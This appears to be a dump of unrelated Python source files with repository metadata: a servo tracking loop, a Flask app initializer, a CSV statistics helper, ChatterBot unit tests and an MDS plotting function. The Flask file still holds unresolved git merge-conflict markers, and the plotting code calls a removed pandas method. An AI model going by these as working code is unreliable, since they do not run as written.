move = PID.calculate(data[0], data[1])
move_x = ((move[0])/2)+90
move_y = ((-move[1])/2)+90
print(move_x, move_y)
servo_count += 1
if servo_count > 3:
servo1.setAngle(move_x)
servo2.setAngle(move_y)
servo_count = 0
cv2.imshow("Frame", data[2])
key = cv2.waitKey(1) & 0xFF
if key == ord("q"):
servo1.stop()
servo2.stop()
camera.stop()
| false
| true
|
790c589fa941e030ddafe079129ac8e67b8eeaee
| 1,246
|
py
|
Python
|
app/__init__.py
|
codebr3ak/Fast-Food-Fast
|
e8acf2a9b9bbc6ac7974a932a84c4dc344a4f968
|
[
"MIT"
] | null | null | null |
app/__init__.py
|
codebr3ak/Fast-Food-Fast
|
e8acf2a9b9bbc6ac7974a932a84c4dc344a4f968
|
[
"MIT"
] | null | null | null |
app/__init__.py
|
codebr3ak/Fast-Food-Fast
|
e8acf2a9b9bbc6ac7974a932a84c4dc344a4f968
|
[
"MIT"
] | 1
|
2021-03-10T05:21:37.000Z
|
2021-03-10T05:21:37.000Z
|
"""
module init
"""
from flask import Flask
<<<<<<< HEAD
from config import config_options
from flask_sqlalchemy import SQLAlchemy
import os
=======
from config import DevelopmentConfig
from .views import orders_blue_print
>>>>>>> ba86ec7ade79a936b81e04ee8b80a97cf8f97770
def create_app(DevelopmentConfig):
"""
Function create_app:
creates app and gives it the import name
holds the configuration being used.
registers the orders blueprint
:return: app:
"""
app = Flask(__name__)
app.config.from_object(DevelopmentConfig)
app.register_blueprint(orders_blue_print)
<<<<<<< HEAD
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
# set the configurations
app.config.from_object(os.environ['APP_SETTINGS'])
db=SQLAlchemy(app)
# initialiaze the database
db.init_app(app)
with app.app_context():
from .import routes
db.create_all
# register your blueprints here
from app.main import main
from app.auth import auth
app.register_blueprint(main)
app.register_blueprint(auth)
@app.route('/')
def hello():
return "Hello World!"
return app
=======
return app
>>>>>>> ba86ec7ade79a936b81e04ee8b80a97cf8f97770
| 21.118644
| 56
| 0.693419
|
"""
module init
"""
from flask import Flask
<<<<<<< HEAD
from config import config_options
from flask_sqlalchemy import SQLAlchemy
import os
=======
from config import DevelopmentConfig
from .views import orders_blue_print
>>>>>>> ba86ec7ade79a936b81e04ee8b80a97cf8f97770
def create_app(DevelopmentConfig):
"""
Function create_app:
creates app and gives it the import name
holds the configuration being used.
registers the orders blueprint
:return: app:
"""
app = Flask(__name__)
app.config.from_object(DevelopmentConfig)
app.register_blueprint(orders_blue_print)
<<<<<<< HEAD
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config.from_object(os.environ['APP_SETTINGS'])
db=SQLAlchemy(app)
db.init_app(app)
with app.app_context():
from .import routes
db.create_all
from app.main import main
from app.auth import auth
app.register_blueprint(main)
app.register_blueprint(auth)
@app.route('/')
def hello():
return "Hello World!"
return app
=======
return app
>>>>>>> ba86ec7ade79a936b81e04ee8b80a97cf8f97770
| false
| true
|
790c594f7ddb0992fcaa78a7176ea150f0f11fb4
| 692
|
py
|
Python
|
MetaLearning/MatchingNetworks/storage.py
|
likesiwell/DL_Code_Repos
|
8e5eb7c8a0e77ea6768ba8c755f671e7f9d02097
|
[
"MIT"
] | 1
|
2018-02-05T13:52:18.000Z
|
2018-02-05T13:52:18.000Z
|
MetaLearning/MatchingNetworks/storage.py
|
likesiwell/DL_Code_Repos
|
8e5eb7c8a0e77ea6768ba8c755f671e7f9d02097
|
[
"MIT"
] | null | null | null |
MetaLearning/MatchingNetworks/storage.py
|
likesiwell/DL_Code_Repos
|
8e5eb7c8a0e77ea6768ba8c755f671e7f9d02097
|
[
"MIT"
] | null | null | null |
import csv
def save_statistics(experiment_name, line_to_add):
    """Append one row to '<experiment_name>.csv'.

    experiment_name: path prefix of the csv file (without extension).
    line_to_add: iterable of values written as a single csv row.
    """
    # newline='' is required by the csv module; without it csv.writer
    # emits doubled line endings (\r\r\n) on Windows.
    with open("{}.csv".format(experiment_name), 'a', newline='') as f:
        writer = csv.writer(f)
        writer.writerow(line_to_add)
def load_statistics(experiment_name):
    """Load '<experiment_name>.csv' into a dict of column-name -> list of values.

    The first row is treated as the header.  All values are returned as
    strings, in file order.  Rows shorter than the header simply
    contribute fewer values (zip truncates), matching the old behaviour.
    """
    data_dict = dict()
    # csv.reader (instead of the old manual split(",")) correctly handles
    # quoted fields containing commas — which the companion
    # save_statistics legitimately writes — and strips \r\n endings.
    with open("{}.csv".format(experiment_name), 'r', newline='') as f:
        reader = csv.reader(f)
        data_labels = next(reader)
        for label in data_labels:
            data_dict[label] = []
        for row in reader:
            for key, item in zip(data_labels, row):
                data_dict[key].append(item)
    return data_dict
| 25.62963
| 58
| 0.58237
|
import csv
def save_statistics(experiment_name, line_to_add):
with open("{}.csv".format(experiment_name), 'a') as f:
writer = csv.writer(f)
writer.writerow(line_to_add)
def load_statistics(experiment_name):
data_dict = dict()
with open("{}.csv".format(experiment_name), 'r') as f:
lines = f.readlines()
data_labels = lines[0].replace("\n","").split(",")
del lines[0]
for label in data_labels:
data_dict[label] = []
for line in lines:
data = line.replace("\n","").split(",")
for key, item in zip(data_labels, data):
data_dict[key].append(item)
return data_dict
| true
| true
|
790c5a487bdcae7102f84217bc9e433fc15e4b6e
| 16,078
|
py
|
Python
|
tests/test_chatbot.py
|
nadimpayak/ChatBot
|
cce2377cb445000a5b2e3bc39b955276ae217740
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_chatbot.py
|
nadimpayak/ChatBot
|
cce2377cb445000a5b2e3bc39b955276ae217740
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_chatbot.py
|
nadimpayak/ChatBot
|
cce2377cb445000a5b2e3bc39b955276ae217740
|
[
"BSD-3-Clause"
] | null | null | null |
from tests.base_case import ChatBotTestCase
from chatterbot.logic import LogicAdapter
from chatterbot.conversation import Statement
class ChatterBotResponseTestCase(ChatBotTestCase):
def test_conversation_values_persisted_to_response(self):
response = self.chatbot.get_response('Hello', persist_values_to_response={
'conversation': 'test 1'
})
self.assertEqual(response.conversation, 'test 1')
def test_tag_values_persisted_to_response(self):
response = self.chatbot.get_response('Hello', persist_values_to_response={
'tags': [
'tag 1',
'tag 2'
]
})
self.assertEqual(len(response.tags), 2)
self.assertIn('tag 1', response.get_tags())
self.assertIn('tag 2', response.get_tags())
def test_in_response_to_provided(self):
"""
Test that the process of looking up the previous response
in the conversation is ignored if a previous response is provided.
"""
self.chatbot.get_response(
text='Hello',
in_response_to='Unique previous response.'
)
statement = self.chatbot.storage.filter(
text='Hello',
in_response_to='Unique previous response.'
)
self.assertIsNotNone(statement)
def test_get_initialization_functions(self):
"""
Test that the initialization functions are returned.
"""
functions = self.chatbot.get_initialization_functions()
self.assertIn('download_nltk_stopwords', str(functions))
self.assertIn('download_nltk_wordnet', str(functions))
self.assertIn('download_nltk_averaged_perceptron_tagger', str(functions))
self.assertIsLength(functions, 3)
def test_get_initialization_functions_spacy_similarity(self):
"""
Test that the initialization functions are returned.
"""
from chatterbot.comparisons import spacy_similarity
list(self.chatbot.search_algorithms.values())[0].compare_statements = spacy_similarity
functions = self.chatbot.get_initialization_functions()
self.assertIn('download_nltk_stopwords', str(functions))
self.assertIn('download_nltk_wordnet', str(functions))
self.assertIn('download_nltk_averaged_perceptron_tagger', str(functions))
self.assertIsLength(functions, 3)
def test_get_initialization_functions_jaccard_similarity(self):
"""
Test that the initialization functions are returned.
"""
from chatterbot.comparisons import jaccard_similarity
list(self.chatbot.search_algorithms.values())[0].compare_statements = jaccard_similarity
functions = self.chatbot.get_initialization_functions()
self.assertIn('download_nltk_wordnet', str(functions))
self.assertIn('download_nltk_stopwords', str(functions))
self.assertIn('download_nltk_averaged_perceptron_tagger', str(functions))
self.assertIsLength(functions, 3)
def test_no_statements_known(self):
"""
If there is no statements in the database, then the
user's input is the only thing that can be returned.
"""
statement_text = 'How are you?'
response = self.chatbot.get_response(statement_text)
results = list(self.chatbot.storage.filter(text=statement_text))
self.assertEqual(response.text, statement_text)
self.assertEqual(response.confidence, 0)
# Make sure that the input and output were saved
self.assertIsLength(results, 2)
self.assertEqual(results[0].text, statement_text)
self.assertEqual(results[1].text, statement_text)
def test_one_statement_known_no_response(self):
"""
Test the case where a single statement is known, but
it is not in response to any other statement.
"""
self.chatbot.storage.create(text='Hello', in_response_to=None)
response = self.chatbot.get_response('Hi')
self.assertEqual(response.confidence, 0)
self.assertEqual(response.text, 'Hello')
def test_one_statement_one_response_known(self):
"""
Test the case that one response is known and there is a response
entry for it in the database.
"""
self.chatbot.storage.create(text='Hello', in_response_to='Hi')
response = self.chatbot.get_response('Hi')
self.assertEqual(response.confidence, 0)
self.assertEqual(response.text, 'Hello')
def test_two_statements_one_response_known(self):
"""
Test the case that one response is known and there is a response
entry for it in the database.
"""
self.chatbot.storage.create(text='Hi', in_response_to=None)
self.chatbot.storage.create(text='Hello', in_response_to='Hi')
response = self.chatbot.get_response('Hi')
self.assertEqual(response.confidence, 1)
self.assertEqual(response.text, 'Hello')
def test_three_statements_two_responses_known(self):
self.chatbot.storage.create(text='Hi', in_response_to=None)
self.chatbot.storage.create(text='Hello', in_response_to='Hi')
self.chatbot.storage.create(text='How are you?', in_response_to='Hello')
first_response = self.chatbot.get_response('Hi')
second_response = self.chatbot.get_response('How are you?')
self.assertEqual(first_response.confidence, 1)
self.assertEqual(first_response.text, 'Hello')
self.assertEqual(second_response.confidence, 0)
def test_four_statements_three_responses_known(self):
self.chatbot.storage.create(text='Hi', in_response_to=None)
self.chatbot.storage.create(text='Hello', in_response_to='Hi')
self.chatbot.storage.create(text='How are you?', in_response_to='Hello')
self.chatbot.storage.create(text='I am well.', in_response_to='How are you?')
first_response = self.chatbot.get_response('Hi')
second_response = self.chatbot.get_response('How are you?')
self.assertEqual(first_response.confidence, 1)
self.assertEqual(first_response.text, 'Hello')
self.assertEqual(second_response.confidence, 1)
self.assertEqual(second_response.text, 'I am well.')
def test_second_response_unknown(self):
self.chatbot.storage.create(text='Hi', in_response_to=None)
self.chatbot.storage.create(text='Hello', in_response_to='Hi')
first_response = self.chatbot.get_response(
text='Hi',
conversation='test'
)
second_response = self.chatbot.get_response(
text='How are you?',
conversation='test'
)
results = list(self.chatbot.storage.filter(text='How are you?'))
self.assertEqual(first_response.confidence, 1)
self.assertEqual(first_response.text, 'Hello')
self.assertEqual(first_response.in_response_to, 'Hi')
self.assertEqual(second_response.confidence, 0)
self.assertEqual(second_response.in_response_to, 'How are you?')
# Make sure that the second response was saved to the database
self.assertIsLength(results, 1)
self.assertEqual(results[0].in_response_to, 'Hi')
def test_statement_added_to_conversation(self):
"""
An input statement should be added to the recent response list.
"""
statement = Statement(text='Wow!', conversation='test')
response = self.chatbot.get_response(statement)
self.assertEqual(statement.text, response.text)
self.assertEqual(response.conversation, 'test')
def test_get_response_additional_response_selection_parameters(self):
self.chatbot.storage.create_many([
Statement('A', conversation='test_1'),
Statement('B', conversation='test_1', in_response_to='A'),
Statement('A', conversation='test_2'),
Statement('C', conversation='test_2', in_response_to='A'),
])
statement = Statement(text='A', conversation='test_3')
response = self.chatbot.get_response(statement, additional_response_selection_parameters={
'conversation': 'test_2'
})
self.assertEqual(response.text, 'C')
self.assertEqual(response.conversation, 'test_3')
def test_get_response_unicode(self):
"""
Test the case that a unicode string is passed in.
"""
response = self.chatbot.get_response(u'سلام')
self.assertGreater(len(response.text), 0)
def test_get_response_emoji(self):
"""
Test the case that the input string contains an emoji.
"""
response = self.chatbot.get_response(u'💩 ')
self.assertGreater(len(response.text), 0)
def test_get_response_non_whitespace(self):
"""
Test the case that a non-whitespace C1 control string is passed in.
"""
response = self.chatbot.get_response(u'')
self.assertGreater(len(response.text), 0)
def test_get_response_two_byte_characters(self):
"""
Test the case that a string containing two-byte characters is passed in.
"""
response = self.chatbot.get_response(u'田中さんにあげて下さい')
self.assertGreater(len(response.text), 0)
def test_get_response_corrupted_text(self):
"""
Test the case that a string contains "corrupted" text.
"""
response = self.chatbot.get_response(u'Ṱ̺̺̕h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳.̨̹͈̣')
self.assertGreater(len(response.text), 0)
def test_response_with_tags_added(self):
"""
If an input statement has tags added to it,
that data should saved with the input statement.
"""
self.chatbot.get_response(Statement(
text='Hello',
in_response_to='Hi',
tags=['test']
))
results = list(self.chatbot.storage.filter(text='Hello'))
self.assertIsLength(results, 2)
self.assertIn('test', results[0].get_tags())
self.assertEqual(results[1].get_tags(), [])
def test_get_response_with_text_and_kwargs(self):
self.chatbot.get_response('Hello', conversation='greetings')
results = list(self.chatbot.storage.filter(text='Hello'))
self.assertIsLength(results, 2)
self.assertEqual(results[0].conversation, 'greetings')
self.assertEqual(results[1].conversation, 'greetings')
def test_get_response_missing_text(self):
with self.assertRaises(self.chatbot.ChatBotException):
self.chatbot.get_response()
def test_get_response_missing_text_with_conversation(self):
with self.assertRaises(self.chatbot.ChatBotException):
self.chatbot.get_response(conversation='test')
def test_generate_response(self):
statement = Statement(text='Many insects adopt a tripedal gait for rapid yet stable walking.')
response = self.chatbot.generate_response(statement)
self.assertEqual(response.text, statement.text)
self.assertEqual(response.confidence, 0)
def test_learn_response(self):
previous_response = Statement(text='Define Hemoglobin.')
statement = Statement(text='Hemoglobin is an oxygen-transport metalloprotein.')
self.chatbot.learn_response(statement, previous_response)
results = list(self.chatbot.storage.filter(text=statement.text))
self.assertIsLength(results, 1)
def test_get_response_does_not_add_new_statement(self):
"""
Test that a new statement is not learned if `read_only` is set to True.
"""
self.chatbot.read_only = True
self.chatbot.get_response('Hi!')
results = list(self.chatbot.storage.filter(text='Hi!'))
self.assertIsLength(results, 0)
def test_get_latest_response_from_zero_responses(self):
response = self.chatbot.get_latest_response('invalid')
self.assertIsNone(response)
def test_get_latest_response_from_one_responses(self):
self.chatbot.storage.create(text='A', conversation='test')
self.chatbot.storage.create(text='B', conversation='test', in_response_to='A')
response = self.chatbot.get_latest_response('test')
self.assertEqual(response.text, 'A')
def test_get_latest_response_from_two_responses(self):
self.chatbot.storage.create(text='A', conversation='test')
self.chatbot.storage.create(text='B', conversation='test', in_response_to='A')
self.chatbot.storage.create(text='C', conversation='test', in_response_to='B')
response = self.chatbot.get_latest_response('test')
self.assertEqual(response.text, 'B')
def test_get_latest_response_from_three_responses(self):
self.chatbot.storage.create(text='A', conversation='test')
self.chatbot.storage.create(text='B', conversation='test', in_response_to='A')
self.chatbot.storage.create(text='C', conversation='test', in_response_to='B')
self.chatbot.storage.create(text='D', conversation='test', in_response_to='C')
response = self.chatbot.get_latest_response('test')
self.assertEqual(response.text, 'C')
def test_search_text_results_after_training(self):
"""
ChatterBot should return close matches to an input
string when filtering using the search_text parameter.
"""
self.chatbot.storage.create_many([
Statement('Example A for search.'),
Statement('Another example.'),
Statement('Example B for search.'),
Statement(text='Another statement.'),
])
results = list(self.chatbot.storage.filter(
search_text=self.chatbot.storage.tagger.get_bigram_pair_string(
'Example A for search.'
)
))
self.assertEqual('Example A for search.', results[0].text)
self.assertEqual('Example B for search.', results[1].text)
self.assertIsLength(results, 2)
class TestAdapterA(LogicAdapter):
def process(self, statement, additional_response_selection_parameters=None):
response = Statement(text='Good morning.')
response.confidence = 0.2
return response
class TestAdapterB(LogicAdapter):
def process(self, statement, additional_response_selection_parameters=None):
response = Statement(text='Good morning.')
response.confidence = 0.5
return response
class TestAdapterC(LogicAdapter):
def process(self, statement, additional_response_selection_parameters=None):
response = Statement(text='Good night.')
response.confidence = 0.7
return response
class ChatBotLogicAdapterTestCase(ChatBotTestCase):
def test_sub_adapter_agreement(self):
"""
In the case that multiple adapters agree on a given
statement, this statement should be returned with the
highest confidence available from these matching options.
"""
self.chatbot.logic_adapters = [
TestAdapterA(self.chatbot),
TestAdapterB(self.chatbot),
TestAdapterC(self.chatbot)
]
statement = self.chatbot.generate_response(Statement(text='Howdy!'))
self.assertEqual(statement.confidence, 0.5)
self.assertEqual(statement.text, 'Good morning.')
def test_chatbot_set_for_all_logic_adapters(self):
for sub_adapter in self.chatbot.logic_adapters:
self.assertEqual(sub_adapter.chatbot, self.chatbot)
self.assertGreater(
len(self.chatbot.logic_adapters), 0,
msg='At least one logic adapter is expected for this test.'
)
def test_response_persona_is_bot(self):
"""
The response returned from the chatbot should be set to the name of the chatbot.
"""
response = self.chatbot.get_response('Hey everyone!')
self.assertEqual(response.persona, 'bot:Test Bot')
| 38.464115
| 123
| 0.668056
|
from tests.base_case import ChatBotTestCase
from chatterbot.logic import LogicAdapter
from chatterbot.conversation import Statement
class ChatterBotResponseTestCase(ChatBotTestCase):
def test_conversation_values_persisted_to_response(self):
response = self.chatbot.get_response('Hello', persist_values_to_response={
'conversation': 'test 1'
})
self.assertEqual(response.conversation, 'test 1')
def test_tag_values_persisted_to_response(self):
response = self.chatbot.get_response('Hello', persist_values_to_response={
'tags': [
'tag 1',
'tag 2'
]
})
self.assertEqual(len(response.tags), 2)
self.assertIn('tag 1', response.get_tags())
self.assertIn('tag 2', response.get_tags())
def test_in_response_to_provided(self):
self.chatbot.get_response(
text='Hello',
in_response_to='Unique previous response.'
)
statement = self.chatbot.storage.filter(
text='Hello',
in_response_to='Unique previous response.'
)
self.assertIsNotNone(statement)
def test_get_initialization_functions(self):
functions = self.chatbot.get_initialization_functions()
self.assertIn('download_nltk_stopwords', str(functions))
self.assertIn('download_nltk_wordnet', str(functions))
self.assertIn('download_nltk_averaged_perceptron_tagger', str(functions))
self.assertIsLength(functions, 3)
def test_get_initialization_functions_spacy_similarity(self):
from chatterbot.comparisons import spacy_similarity
list(self.chatbot.search_algorithms.values())[0].compare_statements = spacy_similarity
functions = self.chatbot.get_initialization_functions()
self.assertIn('download_nltk_stopwords', str(functions))
self.assertIn('download_nltk_wordnet', str(functions))
self.assertIn('download_nltk_averaged_perceptron_tagger', str(functions))
self.assertIsLength(functions, 3)
def test_get_initialization_functions_jaccard_similarity(self):
from chatterbot.comparisons import jaccard_similarity
list(self.chatbot.search_algorithms.values())[0].compare_statements = jaccard_similarity
functions = self.chatbot.get_initialization_functions()
self.assertIn('download_nltk_wordnet', str(functions))
self.assertIn('download_nltk_stopwords', str(functions))
self.assertIn('download_nltk_averaged_perceptron_tagger', str(functions))
self.assertIsLength(functions, 3)
def test_no_statements_known(self):
statement_text = 'How are you?'
response = self.chatbot.get_response(statement_text)
results = list(self.chatbot.storage.filter(text=statement_text))
self.assertEqual(response.text, statement_text)
self.assertEqual(response.confidence, 0)
self.assertIsLength(results, 2)
self.assertEqual(results[0].text, statement_text)
self.assertEqual(results[1].text, statement_text)
def test_one_statement_known_no_response(self):
self.chatbot.storage.create(text='Hello', in_response_to=None)
response = self.chatbot.get_response('Hi')
self.assertEqual(response.confidence, 0)
self.assertEqual(response.text, 'Hello')
def test_one_statement_one_response_known(self):
self.chatbot.storage.create(text='Hello', in_response_to='Hi')
response = self.chatbot.get_response('Hi')
self.assertEqual(response.confidence, 0)
self.assertEqual(response.text, 'Hello')
def test_two_statements_one_response_known(self):
self.chatbot.storage.create(text='Hi', in_response_to=None)
self.chatbot.storage.create(text='Hello', in_response_to='Hi')
response = self.chatbot.get_response('Hi')
self.assertEqual(response.confidence, 1)
self.assertEqual(response.text, 'Hello')
def test_three_statements_two_responses_known(self):
self.chatbot.storage.create(text='Hi', in_response_to=None)
self.chatbot.storage.create(text='Hello', in_response_to='Hi')
self.chatbot.storage.create(text='How are you?', in_response_to='Hello')
first_response = self.chatbot.get_response('Hi')
second_response = self.chatbot.get_response('How are you?')
self.assertEqual(first_response.confidence, 1)
self.assertEqual(first_response.text, 'Hello')
self.assertEqual(second_response.confidence, 0)
def test_four_statements_three_responses_known(self):
self.chatbot.storage.create(text='Hi', in_response_to=None)
self.chatbot.storage.create(text='Hello', in_response_to='Hi')
self.chatbot.storage.create(text='How are you?', in_response_to='Hello')
self.chatbot.storage.create(text='I am well.', in_response_to='How are you?')
first_response = self.chatbot.get_response('Hi')
second_response = self.chatbot.get_response('How are you?')
self.assertEqual(first_response.confidence, 1)
self.assertEqual(first_response.text, 'Hello')
self.assertEqual(second_response.confidence, 1)
self.assertEqual(second_response.text, 'I am well.')
def test_second_response_unknown(self):
self.chatbot.storage.create(text='Hi', in_response_to=None)
self.chatbot.storage.create(text='Hello', in_response_to='Hi')
first_response = self.chatbot.get_response(
text='Hi',
conversation='test'
)
second_response = self.chatbot.get_response(
text='How are you?',
conversation='test'
)
results = list(self.chatbot.storage.filter(text='How are you?'))
self.assertEqual(first_response.confidence, 1)
self.assertEqual(first_response.text, 'Hello')
self.assertEqual(first_response.in_response_to, 'Hi')
self.assertEqual(second_response.confidence, 0)
self.assertEqual(second_response.in_response_to, 'How are you?')
self.assertIsLength(results, 1)
self.assertEqual(results[0].in_response_to, 'Hi')
def test_statement_added_to_conversation(self):
statement = Statement(text='Wow!', conversation='test')
response = self.chatbot.get_response(statement)
self.assertEqual(statement.text, response.text)
self.assertEqual(response.conversation, 'test')
def test_get_response_additional_response_selection_parameters(self):
self.chatbot.storage.create_many([
Statement('A', conversation='test_1'),
Statement('B', conversation='test_1', in_response_to='A'),
Statement('A', conversation='test_2'),
Statement('C', conversation='test_2', in_response_to='A'),
])
statement = Statement(text='A', conversation='test_3')
response = self.chatbot.get_response(statement, additional_response_selection_parameters={
'conversation': 'test_2'
})
self.assertEqual(response.text, 'C')
self.assertEqual(response.conversation, 'test_3')
def test_get_response_unicode(self):
response = self.chatbot.get_response(u'سلام')
self.assertGreater(len(response.text), 0)
def test_get_response_emoji(self):
response = self.chatbot.get_response(u'💩 ')
self.assertGreater(len(response.text), 0)
def test_get_response_non_whitespace(self):
response = self.chatbot.get_response(u'')
self.assertGreater(len(response.text), 0)
def test_get_response_two_byte_characters(self):
response = self.chatbot.get_response(u'田中さんにあげて下さい')
self.assertGreater(len(response.text), 0)
def test_get_response_corrupted_text(self):
response = self.chatbot.get_response(u'Ṱ̺̺̕h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳.̨̹͈̣')
self.assertGreater(len(response.text), 0)
def test_response_with_tags_added(self):
self.chatbot.get_response(Statement(
text='Hello',
in_response_to='Hi',
tags=['test']
))
results = list(self.chatbot.storage.filter(text='Hello'))
self.assertIsLength(results, 2)
self.assertIn('test', results[0].get_tags())
self.assertEqual(results[1].get_tags(), [])
def test_get_response_with_text_and_kwargs(self):
self.chatbot.get_response('Hello', conversation='greetings')
results = list(self.chatbot.storage.filter(text='Hello'))
self.assertIsLength(results, 2)
self.assertEqual(results[0].conversation, 'greetings')
self.assertEqual(results[1].conversation, 'greetings')
def test_get_response_missing_text(self):
with self.assertRaises(self.chatbot.ChatBotException):
self.chatbot.get_response()
def test_get_response_missing_text_with_conversation(self):
with self.assertRaises(self.chatbot.ChatBotException):
self.chatbot.get_response(conversation='test')
def test_generate_response(self):
statement = Statement(text='Many insects adopt a tripedal gait for rapid yet stable walking.')
response = self.chatbot.generate_response(statement)
self.assertEqual(response.text, statement.text)
self.assertEqual(response.confidence, 0)
def test_learn_response(self):
previous_response = Statement(text='Define Hemoglobin.')
statement = Statement(text='Hemoglobin is an oxygen-transport metalloprotein.')
self.chatbot.learn_response(statement, previous_response)
results = list(self.chatbot.storage.filter(text=statement.text))
self.assertIsLength(results, 1)
def test_get_response_does_not_add_new_statement(self):
self.chatbot.read_only = True
self.chatbot.get_response('Hi!')
results = list(self.chatbot.storage.filter(text='Hi!'))
self.assertIsLength(results, 0)
def test_get_latest_response_from_zero_responses(self):
response = self.chatbot.get_latest_response('invalid')
self.assertIsNone(response)
def test_get_latest_response_from_one_responses(self):
self.chatbot.storage.create(text='A', conversation='test')
self.chatbot.storage.create(text='B', conversation='test', in_response_to='A')
response = self.chatbot.get_latest_response('test')
self.assertEqual(response.text, 'A')
def test_get_latest_response_from_two_responses(self):
self.chatbot.storage.create(text='A', conversation='test')
self.chatbot.storage.create(text='B', conversation='test', in_response_to='A')
self.chatbot.storage.create(text='C', conversation='test', in_response_to='B')
response = self.chatbot.get_latest_response('test')
self.assertEqual(response.text, 'B')
def test_get_latest_response_from_three_responses(self):
self.chatbot.storage.create(text='A', conversation='test')
self.chatbot.storage.create(text='B', conversation='test', in_response_to='A')
self.chatbot.storage.create(text='C', conversation='test', in_response_to='B')
self.chatbot.storage.create(text='D', conversation='test', in_response_to='C')
response = self.chatbot.get_latest_response('test')
self.assertEqual(response.text, 'C')
def test_search_text_results_after_training(self):
self.chatbot.storage.create_many([
Statement('Example A for search.'),
Statement('Another example.'),
Statement('Example B for search.'),
Statement(text='Another statement.'),
])
results = list(self.chatbot.storage.filter(
search_text=self.chatbot.storage.tagger.get_bigram_pair_string(
'Example A for search.'
)
))
self.assertEqual('Example A for search.', results[0].text)
self.assertEqual('Example B for search.', results[1].text)
self.assertIsLength(results, 2)
class TestAdapterA(LogicAdapter):
def process(self, statement, additional_response_selection_parameters=None):
response = Statement(text='Good morning.')
response.confidence = 0.2
return response
class TestAdapterB(LogicAdapter):
def process(self, statement, additional_response_selection_parameters=None):
response = Statement(text='Good morning.')
response.confidence = 0.5
return response
class TestAdapterC(LogicAdapter):
def process(self, statement, additional_response_selection_parameters=None):
response = Statement(text='Good night.')
response.confidence = 0.7
return response
class ChatBotLogicAdapterTestCase(ChatBotTestCase):
def test_sub_adapter_agreement(self):
self.chatbot.logic_adapters = [
TestAdapterA(self.chatbot),
TestAdapterB(self.chatbot),
TestAdapterC(self.chatbot)
]
statement = self.chatbot.generate_response(Statement(text='Howdy!'))
self.assertEqual(statement.confidence, 0.5)
self.assertEqual(statement.text, 'Good morning.')
def test_chatbot_set_for_all_logic_adapters(self):
for sub_adapter in self.chatbot.logic_adapters:
self.assertEqual(sub_adapter.chatbot, self.chatbot)
self.assertGreater(
len(self.chatbot.logic_adapters), 0,
msg='At least one logic adapter is expected for this test.'
)
def test_response_persona_is_bot(self):
response = self.chatbot.get_response('Hey everyone!')
self.assertEqual(response.persona, 'bot:Test Bot')
| true
| true
|
790c5b379c0da24ecfec766b38b7d9d3632b32e1
| 2,638
|
py
|
Python
|
plot_mds_cond.py
|
jona-sassenhagen/URIAL
|
ed4e9cc99bac0a7ec8772ad72c3d85581be71de0
|
[
"BSD-3-Clause"
] | null | null | null |
plot_mds_cond.py
|
jona-sassenhagen/URIAL
|
ed4e9cc99bac0a7ec8772ad72c3d85581be71de0
|
[
"BSD-3-Clause"
] | null | null | null |
plot_mds_cond.py
|
jona-sassenhagen/URIAL
|
ed4e9cc99bac0a7ec8772ad72c3d85581be71de0
|
[
"BSD-3-Clause"
] | null | null | null |
def plot_mds_cond(rdm):
'''function to visualize RDM via multidimensional scaling'''
# big kudos to Jona Sassenhagen for doing an amazing job
# adding condition names and colors to the mds plot
# import modules and functions
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
from sklearn import manifold
from sklearn.decomposition import PCA
from matplotlib.collections import LineCollection
## computation/transformation section
# read in the rdm in .csv format, creating a data frame
df = pd.read_csv(rdm, index_col=0)
df.index = df.columns # set data frame index based on columns
# set seed for mds
seed = 0
# create mds object
mds = manifold.MDS(n_components=2, max_iter=3000, eps=1e-9, random_state=seed,
dissimilarity="precomputed", n_jobs=1)
# apply mds to data frame
rdm_mds = mds.fit(df.values).embedding_
# create new data frame from mds
df_mds = pd.DataFrame(rdm_mds, index=df.index, columns=["dim1", "dim2"])
df_mds["cond"] = df_mds.index # create condition column based on index
# create pca object
clf = PCA(n_components=2)
# set rdm data frame based on data frame values
rdm = pd.DataFrame(df.values)
# scale data
rdm = rdm.max() / rdm * 100
rdm[np.isinf(rdm)] = 0
# convert rdm data frame to array
rdm = rdm.as_matrix()
# apply pca to mds
rdm_mds_pca = clf.fit_transform(rdm_mds)
## plotting section
sns.set_style("white") # set seaborn style to white
# create lmplot from the mds data frame
g = sns.lmplot("dim1", "dim2", hue="cond", data=df_mds, fit_reg=False, legend=False)
ax = g.ax # set axes
sns.despine(ax=ax, trim=True, left=True, bottom=True) # despine graphic
ax.axes.get_xaxis().set_visible(False) # remove x axis
ax.axes.get_yaxis().set_visible(False) # remove y axis
ax.grid(False) # remove gird
# add condition names to plot
for dim1, dim2, name in df_mds.values:
ax.text(dim1 * 1.05, dim2 * 1.05, name)
# create segments
segments = [[rdm_mds[i, :], rdm_mds[j, :]]
for i in range(len(rdm_mds_pca)) for j in range(len(rdm_mds_pca))]
values = np.abs(rdm)
# set line collection
lc = LineCollection(segments,
zorder=0, cmap=plt.cm.Greys,
norm=plt.Normalize(0, values.max()))
lc.set_array(rdm.flatten())
lc.set_linewidths(0.5 * np.ones(len(segments)))
ax.add_collection(lc) # add line collection to plot
plt.tight_layout()
plt.show()
| 32.975
| 88
| 0.653904
|
def plot_mds_cond(rdm):
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
from sklearn import manifold
from sklearn.decomposition import PCA
from matplotlib.collections import LineCollection
ex_col=0)
df.index = df.columns
seed = 0
mds = manifold.MDS(n_components=2, max_iter=3000, eps=1e-9, random_state=seed,
dissimilarity="precomputed", n_jobs=1)
rdm_mds = mds.fit(df.values).embedding_
df_mds = pd.DataFrame(rdm_mds, index=df.index, columns=["dim1", "dim2"])
df_mds["cond"] = df_mds.index
clf = PCA(n_components=2)
rdm = pd.DataFrame(df.values)
rdm = rdm.max() / rdm * 100
rdm[np.isinf(rdm)] = 0
rdm = rdm.as_matrix()
rdm_mds_pca = clf.fit_transform(rdm_mds)
